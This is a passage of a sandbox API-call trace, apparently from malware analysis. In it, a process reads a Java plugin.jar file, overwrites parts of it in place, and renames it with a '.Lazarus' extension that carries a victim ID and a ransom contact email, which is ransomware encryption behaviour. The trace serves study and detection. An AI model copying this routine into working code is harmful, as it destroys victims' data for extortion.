dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0097.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.670] AreFileApisANSI () returned 1 [0097.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0097.670] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6c) returned 0x75eb8 [0097.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x75eb8, cchWideChar=54 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties") returned 54 [0097.670] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\net.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\net.properties"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8c76e77, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8c76e77, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c76e77, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1170)) returned 1 [0097.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0097.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0097.670] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0097.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0097.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0097.671] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.671] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.671] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8d81efe, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8d81efe, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8df45fe, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1d588b, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="plugin.jar", cAlternateFileName="")) returned 1 [0097.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0097.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0097.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0097.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0097.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0097.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0097.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0097.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0097.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0097.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0097.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0097.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0097.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0097.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0097.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0097.671] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.671] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.671] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.671] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0097.671] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.671] AreFileApisANSI () returned 1 [0097.671] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar", lpUsedDefaultChar=0x0) returned 50 [0097.671] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0097.671] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.672] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0097.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0097.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0097.672] AreFileApisANSI () returned 1 [0097.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0097.672] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x462e8 [0097.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x462e8, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar") returned 50 [0097.672] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\plugin.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.673] GetFileType (hFile=0x360) returned 0x1 [0097.673] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x462e8 | out: hHeap=0x20000) returned 1 [0097.673] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0097.673] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0097.673] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0097.673] CloseHandle (hObject=0x360) returned 1 [0097.673] AreFileApisANSI () returned 1 [0097.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0097.673] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46208 [0097.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x46208, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar") returned 50 [0097.674] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\plugin.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.674] GetFileType (hFile=0x360) returned 0x1 [0097.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46208 | out: hHeap=0x20000) returned 1 [0097.674] CloseHandle (hObject=0x360) returned 1 [0097.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0097.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0097.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.674] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.674] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0097.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0097.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0097.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0097.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.675] AreFileApisANSI () returned 1 [0097.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0097.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46908 [0097.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x46908, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar") returned 50 [0097.675] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\plugin.jar"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8d81efe, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8d81efe, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8df45fe, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1d588b)) returned 1 [0097.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46908 | out: hHeap=0x20000) returned 1 [0097.675] AreFileApisANSI () returned 1 [0097.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f4e8, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0097.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0097.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0097.675] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0097.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0097.675] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0097.676] GetLastError () returned 0x0 [0097.676] SetLastError (dwErrCode=0x0) [0097.676] AreFileApisANSI () returned 1 [0097.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0097.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46048 [0097.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x46048, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar") returned 50 [0097.676] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\plugin.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.676] GetFileType (hFile=0x360) returned 0x1 [0097.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0097.676] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3113594 | out: lpNewFilePointer=0x0) returned 1 [0097.676] ReadFile (in: hFile=0x360, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113570, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113570*=0x15000, lpOverlapped=0x0) returned 1 [0097.678] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x954b0 [0097.679] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x3113518*=0x1000, lpOverlapped=0x0) returned 1 [0097.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6f0 [0097.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d618 [0097.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e260 [0097.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x8f448 [0097.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bd10 [0097.680] GetLastError () returned 0x0 [0097.680] SetLastError (dwErrCode=0x0) [0097.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0097.680] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0097.680] WriteFile (in: hFile=0x360, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0097.681] WriteFile (in: hFile=0x360, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0097.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x954b0 | out: hHeap=0x20000) returned 1 [0097.681] CloseHandle (hObject=0x360) returned 1 [0097.681] AreFileApisANSI () returned 1 [0097.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0097.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x46b38 [0097.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x46b38, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar") returned 50 [0097.681] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\plugin.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0097.681] GetFileType (hFile=0x360) returned 0x1 [0097.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46b38 | out: hHeap=0x20000) returned 1 [0097.681] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x311357c | out: lpNewFilePointer=0x0) returned 1 [0097.682] ReadFile (in: hFile=0x360, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113558, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113558*=0x15000, lpOverlapped=0x0) returned 1 [0097.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x954b0 [0097.683] ReadFile (in: hFile=0x360, lpBuffer=0x954b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113500, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesRead=0x3113500*=0x1000, lpOverlapped=0x0) returned 1 [0097.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e378 [0097.684] GetLastError () returned 0x0 [0097.684] SetLastError (dwErrCode=0x0) [0097.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0097.685] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0097.685] WriteFile (in: hFile=0x360, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0097.685] WriteFile (in: hFile=0x360, lpBuffer=0x954b0*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x954b0*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0097.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x954b0 | out: hHeap=0x20000) returned 1 [0097.685] CloseHandle (hObject=0x360) returned 1 [0097.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0097.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71c38 [0097.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0097.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ab20 [0097.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71c38 | out: hHeap=0x20000) returned 1 [0097.686] AreFileApisANSI () returned 1 [0097.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0097.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x64) returned 0x460b8 [0097.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x460b8, cchWideChar=50 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar") returned 50 [0097.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8ab20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 112 [0097.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x89558 [0097.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8ab20, cbMultiByte=-1, lpWideCharStr=0x89558, cchWideChar=112 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 112 [0097.686] MoveFileExW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\plugin.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\plugin.jar.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\plugin.jar.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwFlags=0x2) returned 1 [0097.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x89558 | out: hHeap=0x20000) returned 1 [0097.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x460b8 | out: hHeap=0x20000) returned 1 [0097.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0097.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d618 | out: hHeap=0x20000) returned 1 [0097.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6f0 | out: hHeap=0x20000) returned 1 [0097.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8f448 | out: hHeap=0x20000) returned 1 [0097.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bd10 | out: hHeap=0x20000) returned 1 [0097.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0097.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0097.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0097.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0097.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0097.687] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0097.687] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 